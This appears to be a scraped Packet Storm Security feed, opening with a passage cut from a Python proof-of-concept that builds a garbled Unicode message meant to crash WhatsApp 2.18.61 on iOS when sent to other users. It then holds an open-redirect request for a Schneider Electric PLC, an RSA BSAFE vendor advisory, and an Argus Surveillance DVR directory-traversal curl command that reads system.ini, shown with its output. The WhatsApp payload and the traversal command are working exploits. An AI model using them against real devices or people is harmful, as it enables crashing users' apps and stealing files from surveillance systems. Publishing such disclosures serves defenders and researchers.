a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)'
    payload2 =
u'aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?'
    sutf8 = payload1.encode('UTF-8')
    sutf8 = payload2.encode('UTF-8')
    finalPoC = payload1 + "\n" + payload2
    print "[*] Writing to file: " + filename
    open(filename, 'w').write(finalPoC)
    print "[*] Done."

def howtouse():
    print "Usage: whatsapp.py [FILENAME]"
    print "[*] Mandatory arguments:"
    print "[-] FILENAME"
    sys.exit(-1)

if __name__ == "__main__":
    try:
        print "[*] WhatsApp 2.18.61 iOS - Remote memory corruption"
        print "[*] Author: jsacco@exploitpack.com - http://exploitpack.com"
        print "[*] How to use: Copy the content of the file and send
it as a message to another whatsapp user or group"
        whatsapp(sys.argv[1])
    except IndexError:
        howtouse()

Source:packetstormsecurity.com

Schneider Electric BMX P34 CPU B Open Redirect

August 28, 2018, 9:36 am
$
0
0

Schneider Electric BMX P34 CPU B suffers from an open redirection vulnerability.


MD5 | 7a5d0f61e43d7018f39d1734d3968575

Download
# Exploit Title: Schneider Electric BMX P34 CPU B - Unvalidated Redirects and Forwards
# Date: 2018-07-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.schneider-electric.com/
# Hardware Link : https://www.schneider-electric.com/en/product/BMXP342020/
# Software : Schneider Electric BMXP342020
# Product Version:  BMX P34 CPU B
# Vulernability Type : Unvalidated Redirects and Forwards
# Vulenrability : Open Redirect
# CVE : N/A

# An Open Redirect security vulnerability has been discovered in the Schneider Electric BMX P34 CPU B hardware product.

HTTP POST Request :

GET /html/english/home/index.htm?http://TARGET HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: TUE JAN 01 00:00:45 1980
Cache-Control: max-age=0

HTTP Response Request :

GET /success.txt HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Connection: close

Source:packetstormsecurity.com

RSA BSAFE Micro Edition Suite / Crypto-C Micro Edition Overflow / DoS

August 28, 2018, 4:43 pm
$
0
0

RSA BSAFE Micro Edition Suite and Crypto-C Micro Edition suffer from resource exhaustion, integer overflow, improper clearing of heap memory, covert timing channel, and buffer over-read vulnerabilities.


MD5 | 7f36cb3747b5ff6824d98003f1658462

Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

DSA-2018-128: RSA BSAFE Micro Edition Suite and Crypto-C Micro Edition Multiple Security Vulnerabilities

Dell EMC Identifier:  DSA-2018-128

CVE Identifier:  CVE-2018-11054, CVE-2018-11055, CVE-2018-11056, CVE-2018-11057, CVE-2018-11058


Severity:  High


Severity Rating:  View details below for individual CVSS Score for each CVE.


Affected Products:

RSA BSAFE Crypto-C Micro Edition versions prior to 4.0.5.3 (CVE-2018-11056, CVE-2018-11058)
RSA BSAFE Micro Edition Suite versions prior to 4.1.6.1 in the 4.1.x series (CVE-2018-11055, CVE-2018-11056, CVE-2018-11057)
RSA BSAFE Micro Edition Suite version 4.1.6 (CVE-2018-11054)
RSA BSAFE Micro Edition Suite versions prior to 4.1.6 in the 4.1.x series (CVE-2018-11058)
RSA BSAFE Micro Edition Suite versions prior to 4.0.11 in the 4.0.x series (CVE-2018-11055, CVE-2018-11057, CVE-2018-11058)


Summary:

RSA BSAFE Micro Edition Suite and Crypto-C Micro Edition contain fixes for multiple security vulnerabilities that could potentially be exploited by malicious users to compromise the affected systems.



Details:

Integer overflow vulnerability - CVE-2018-11054 
RSA BSAFE Micro Edition Suite, version 4.1.6, contains an integer overflow vulnerability. A remote attacker could use maliciously constructed ASN.1 data to potentially cause a Denial Of Service. 
CVSS v3.0 Base Score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)


Improper Clearing of Heap Memory Before Release ('Heap Inspection') - CVE-2018-11055 
RSA BSAFE Micro Edition Suite, versions prior to 4.0.11 (in 4.0.x) and prior to 4.1.6.1 (in 4.1.x), contains an Improper Clearing of Heap Memory Before Release ('Heap Inspection') vulnerability. Decoded PKCS #12 data in heap memory is not zeroized by MES before releasing the memory internally and a malicious local user could gain access to the unauthorized data by doing heap inspection.
CVSS v3.0 Base Score: 4.4 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)


Uncontrolled Resource Consumption ('Resource Exhaustion') - CVE-2018-11056 
RSA BSAFE Micro Edition Suite, prior to 4.1.6.1 (in 4.1.x), and RSA BSAFE Crypto-C Micro Edition versions prior to 4.0.5.3 (in 4.0.x) contain an Uncontrolled Resource Consumption ('Resource Exhaustion') vulnerability when parsing ASN.1 data. A remote attacker could use maliciously constructed ASN.1 data that would exhaust the stack, potentially causing a Denial Of Service.
CVSS v3.0 Base Score: 6.5 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)


Covert Timing Channel - CVE-2018-11057 
RSA BSAFE Micro Edition Suite, versions prior to 4.0.11 (in 4.0.x) and prior to 4.1.6.1 (in 4.1.x) contains a Covert Timing Channel vulnerability during RSA decryption, also known as a Bleichenbacher attack on RSA decryption. A remote attacker may be able to recover a RSA key.
CVSS v3.0 Base Score: 5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)


Buffer over-read - CVE-2018-11058
RSA BSAFE Micro Edition Suite, versions prior to 4.0.11 (in 4.0.x) and prior to 4.1.6 (in 4.1.x), and RSA BSAFE Crypto-C Micro Edition, version prior to 4.0.5.3 (in 4.0.x) contain a Buffer Over-Read vulnerability when parsing ASN.1 data. A remote attacker could use maliciously constructed ASN.1 data that would result in such issue.
CVSS v3.0 Base Score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)



Recommendation:

The following RSA Micro Edition Suite release contains resolutions to these vulnerabilities:

RSA BSAFE Crypto-C Micro Edition version 4.0.5.3
RSA BSAFE Micro Edition Suite version 4.0.11
RSA BSAFE Micro Edition Suite version 4.1.6.1

RSA recommends all customers upgrade at the earliest opportunity.



For additional documentation, downloads, and more, visit the RSA BSAFE page on RSA Link.


Severity Rating:

For an explanation of Severity Ratings, refer to the Knowledge Base Article, "Security Advisories Severity Rating" at https://community.rsa.com/docs/DOC-47147. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.



EOPS Policy:

RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the Product Version Life Cycle for additional details.



Legal Information:

Read and use the information in this RSA Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this advisory, contact RSA Customer Support. RSA Security LLC and its affiliates, including without limitation, its ultimate parent company, Dell Technologies, distribute RSA Security Advisories in order to bring to the attention of users of the affected RSA products, important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA, its affiliates or its suppliers, be liable for any damages whatsoever including direct, indirect, inciden
 tal, consequential, loss of business profits or special damages, even if RSA, its affiliates or its suppliers have been advised of the possibility of such damages. Some jurisdictions do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.

Dell Product Security Incident Response Team
secure@dell.com
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEP5nobPoCj3pTvhAZgSlofD2Yi6cFAluFTigACgkQgSlofD2Y
i6el/g//Y4fYbRIuWL8Xa72Jw/h5l+twOqAt+BITYY2tRRyMOzu5+pWkcyd3a3KN
If5zBDbp0NZGOsHwz40u2K5oAtq6oyjDGrdCj/gCH+cEg+rxOz04jWEQuVCFaWA1
QRDURb+A5w2tRZjPxf64bFDlEHF/9vCyLKtACV8rNAw7ui/+0UWynVSBGVoZZeAr
QRIsPz3fABJIH51QyVSCcmCsS0mQXQAsL9kEYSFmCcqf+ABVicEcWVk6+3ojXMZo
DD94NztR/Nw3xQcEtGk6Urt6D2K66VSujVdeRUzdayjGxKxv/qQN/KxAlUSNO5W3
b0tZjJkOjZhQzxic0zlxj31TF36MIDffnMEMTIH0XWFFyzwrLXHQuXduJesZSFdK
gOi0+Rq8ltBUcX/oFKNHAwfBkhQrFBtFU272nwiKtjk6fWcy/sZQDFlPgohcLgKM
cyyNaBbHv42nyRyn337A57+kwVIOiogJ3xOY2di+zHieZQ9lPxwzJqxVmF/VaZTD
+k5tgauHeZU+QDJ+9k4lBZhI6qiBt5gAaib5gs3wsoPlMEq068Q/T9/c2jjXTQab
LJIDsFJar69E6PWE+Gtx2Ri5g10lF6iNLvVEYUQC8WNPeMGdwU1yLJQn0YemHuSS
9SX7VJKO5nW9+bKHjGm9ca+eQfqjd4BUMr0pYJ2tvq5XY7OIGTU=
=8lXb
-----END PGP SIGNATURE-----



Source:packetstormsecurity.com

Argus Surveillance DVR 4.0.0.0 Directory Traversal

August 28, 2018, 4:44 pm
$
0
0

Argus Surveillance DVR version 4.0.0.0 suffers from file disclosure and traversal vulnerabilities.


MD5 | 236a5ef23b5453a2a50a23ab72a165af

Download
[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
[+] ISR: Apparition Security          

Greetz: ***Greetz: indoushka | Eduardo | GGA***


[Vendor]
www.argussurveillance.com


[Product]
Argus Surveillance DVR - 4.0.0.0

Our DVR software provides scheduled, continuous or activated upon motion detection video recording. You can monitor unlimited number of cameras, through Internet or on-site.
When our surveillance software detects motion in the monitored area, it sounds alarm, e-mails captured images, or records video.
This is security surveillance IP camera software. It has features to place image overlays and date/time stamps, adjust picture size / quality, and Pan/Tilt/Zoom control.


[Vulnerability Type]
Directory Traversal


[CVE Reference]
CVE-2018-15745


[Security Issue]
Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure
via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.


[Affected Component]
WEBACCOUNT.CGI RESULTPAGE parameter


[Exploit/POC]
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="

; for 16-bit app support
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

wave=mmdrv.dll
timer=timer.drv



[Video POC URL]
https://vimeo.com/287115273



[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Vendor Notification: August 17, 2018
Second attempt: August 21, 2018
CVE Assigned Mitre: August 23, 2018
August 28, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Source:packetstormsecurity.com
Viewing all 13315 articles
Browse latest View live
Search